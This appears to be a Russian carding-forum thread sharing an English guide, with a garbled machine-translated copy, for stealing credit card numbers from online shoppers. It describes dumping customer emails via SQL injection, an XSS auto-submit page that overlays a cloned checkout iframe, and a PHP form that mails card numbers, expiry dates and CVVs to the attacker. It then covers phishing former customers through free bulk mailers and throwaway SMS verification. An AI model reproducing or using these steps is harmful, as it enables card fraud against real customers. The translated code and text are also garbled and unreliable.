В теме 10 сообщений

Нашёл мануал по добыче СС

Единственный Минус, нужно грамотно перевести

Get Fresh & Private CC’s Direct in Your Inbox Through XSS & SQL Injection

This is My Method for Getting Fresh CC info,

Sent Directly to an inbox of your choice!

First, you need to find yourself a vulnerable shop.

Won’t go into too many details here, this should be pretty drilled into your head by now.

You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc.

What are you looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it’s encrypted, MD5, FPE,

whatever it is it’s not feasible to work with that.

However, one thing you can work with is the current and former customer’s e-mail addresses.

Go ahead and rip the whole table with the customer information. If you’re lucky, you’ll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I’ve noticed the most common being POST vulnerability,

so I’ll go that route, but you can incorporate it with FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately,

with one exception, a giant IFRAME over it which of course is going to be another page You Make….

<html> <head> <script language=javascript> function submitPostLink() :zin:{ document.postlink.submit(); } </script> </head> <body onload="submitPostLink()"> <form action="http://www.XXXXXXXco...TextSearch.asp" name=postlink method="post"> <input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src="Ecommerce Web Site Hosting and Streaming from YourHost.com width="800"height="2400" style="z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;" frameborder=0 align=center></iframe>"> </form> </body> </html>

Go ahead and goto the checkout page for the site you’re working with,

and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto).

Now, you need to edit the main file you just saved.

Search for «action=», and change the page following it to your third page you will make,

which will be the PHP mail form that will send your e-mail all the information someone fills in the form.

The code will look something like


$userinfo = "@com"; //your email here

$ip = getenv("REMOTE_ADDR");

$message .= "".$_POST***91;'firstname'***93;."

$message .= "".$_POST***91;'lastname'***93;."

$message .= "".$_POST***91;'org_name'***93;."

$message .= "".$_POST***91;'telephone'***93;."

$message .= "".$_POST***91;'fax'***93;."

$message .= "".$_POST***91;'email'***93;."

$message .= "---------------------------------------------

$message .= "".$_POST***91;'cctype'***93;."

$message .= "".$_POST***91;'credcard'***93;."

$message .= "".$_POST***91;'exp_mon'***93;."

$message .= "".$_POST***91;'exp_year'***93;."

$message .= "".$_POST***91;'cccvv'***93;."

$message .= "".$_POST***91;'ccname'***93;."

$subject="SUBJECT - $ip";

$headers = "From: NAMEl<@.com>";

$headers .= $_POST***91;'eMailAdd'***93;."

$headers .= "MIME-Version: 1.0



You’ll Need to Follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of«sorry, this offer is no longer available» or something of the sort. I’ll explain why right now.

After putting all this together and uploading it to a host, you’ll want to shorten youre redirect.html URL, you can use bit.ly, or another shortening service.

Then, you can send an e-mail to all the customers e-mail addresses,(AND YOU SHOULD BE CREATIVE),

but something along the lines of them being a valuable customer,and because of that, you’re giving them one of your newest products for only 99 cents!Make sure that on your checkout form, you list the item you choose, so they see it when they’re checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if you don’t have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free.

You’ll have to confirm your account with a cell phone,but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with No Registration.

Trust me, if you send enough e-mails to former customers,especially when it’s in the Health and Supplement Niche,

if They Get an Offer for a 99 cent Bottle or something, they’re Gonna Jump all over That!

That’s It…. Now Be Ready For Fresh and Private CC’s ……

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Современные браузеры на такую хрень отреагируют. Будет показано сообщение, что страница не безопасна.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Получите прямой Fresh & Private CC в вашем почтовом ящике за счет XSS и SQL Injection

Это мой метод для получения пресной данные CC,

направляются непосредственно к почтовый ящик по вашему выбору!

Во-первых, вам нужно найти сами уязвимы магазин.

Не будем вдаваться в слишком много деталей здесь, это должно быть довольно пробурена в голову сейчас.

Вы можете сделать это с Google Dorks вручную или использовать такие инструменты, как WebCruiser, SQLI яда и т.д.

Что вы ищете для это магазин с обеих SQLI уязвимостей и XSS уязвимостей.

Во-первых, как вы могли заметить, в большинстве баз данных, содержащих CC информацию, он зашифрован, MD5, ФПО,

то, что это это не представляется возможным работать с этим.

Тем не менее, одна вещь, которую может работать с это адреса электронной почты нынешними и бывшими клиента.

Идите вперед и копировать всю таблицу с информацией о клиенте. Если вам повезет, то вы получите, по крайней мере 10 000 адресов электронной почты или более.

Далее, вам нужно работать с уязвимостью XSS. Я заметил, наиболее распространенными из которых являются POST уязвимость,

так что я буду идти по этому пути, но вы можете включить его с формой или любой другой.

Вы можете использовать следующий код, чтобы сделать redirect.html или что вы хотите назвать его. Эта страница будет немедленно загрузить уязвимый сайт,

с одним исключением, гигант IFRAME над ним, который, конечно, будет другая страница You Make ....

< HTML > < голова > <скриптовый язык = Javascript > функция submitPostLink ( ) : Zin : { документ . postlink . представить ( ) ; } </ SCRIPT> </ голова > < тело onload = "submitPostLink ()" > < действие формы = " HTTP: //www.XXXXXXXco...TextSearch.asp " имя = postlink Метод = "Сообщение" > < тип входного = "скрытые" Имя = "NAMEOFVULNERABLEFIELD" значение = "<IFRAME SRC = & Quot Хостинг Электронная торговля Веб-сайта и в потоковом режиме с YourHost.com Ширина = & Quot; 800 & Quot; высота = & Quot; 2400 & Quot; стиль = & Quot; г-индекс: 0; позицию: абсолютная; сверху: 0; слева: 0; переполнение-й: скрытый; & Quot; frameborder = 0 выровнять = центр> </ IFRAME> " > </ образуют > </ тело > </ HTML >

Идите вперед и Перейти на страницу оформления заказа на сайте, вы работаете с,

и сохраните страницу на жестком диске, включая все поддиректории файлов и изображений (Firefox делает это авто).

Теперь, вам нужно отредактировать Основной файл, который вы только что сохранили.

Поиск «Action =», а также изменить страницы, следуя его на третьей странице вы сделаете,

которая будет PHP почты форма, которая будет посылать ваш адрес электронной почты вся информация кто заполняет форму.

код будет выглядеть примерно так


$ UserInfo = "com" ; // вашу электронную почту

- $ IP " ;

$ заголовки = ":" От NAMEl <. @ ком> ;

$ заголовки . = $ _POST *** 91 ; 'eMailAdd " *** 93 .; " п " ;

заголовки $ . = "MIME -версии: 1,0 п " ;

почта ( $ UserInfo , $ вопросу , $ послание , $ заголовки ) ;


Вы должны следовать этот код с некоторых HTML-код, который также выглядит как копия своего сайта, но с какой-то текст говоря что-то вдоль линий «извините, это предложение уже не доступны» или что-то в этом роде. Я объясню, почему сейчас.

После ввода все это вместе и отправить его на хост, вы хотите, чтобы сократить Youre перенаправить .html URL, вы можете использовать bit.ly или другой сервис сокращения.

Затем, вы можете отправить по электронной почте для всех клиентов адреса электронной почты (и вы должны быть творческие),

но что-то вдоль линий из них ценный клиент, и из-за этого, вы даете им одну из своих новейших продуктов всего за 99 центов! Убедитесь, что на вашей форме проверки, вы перечисляете пункт, который вы выбрали, чтобы они увидели это, когда они проверить.

отличный сервис для отправки массовых рассылок для свободного и нет суда или что-нибудь, что не является, если вы не взломали SMTP в использовании, targethero.com

Они позволяют отправлять неограниченное электронной почты, чтобы до 5000 различных контактов. Не плохо бесплатно.

Вам придется подтвердить свой ​​аккаунт с мобильного телефона, но вы должны просто использовать receive-sms-online.com или freesmsreceive.com/index.php, где вы можете получить сообщения, отправленные на вас без регистрации.

Поверьте мне, если вы отправляете достаточно электронной почты бывших клиентов, особенно когда он находится в Здоровье и дополнение ниши,

если они получают предложение для 99 центов бутылка или чего-то, что они собираются Перейти всему, что!

Вот и все .... Теперь Будьте готовы для свежего и частного КК ......

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя


Уже есть аккаунт? Войти в систему.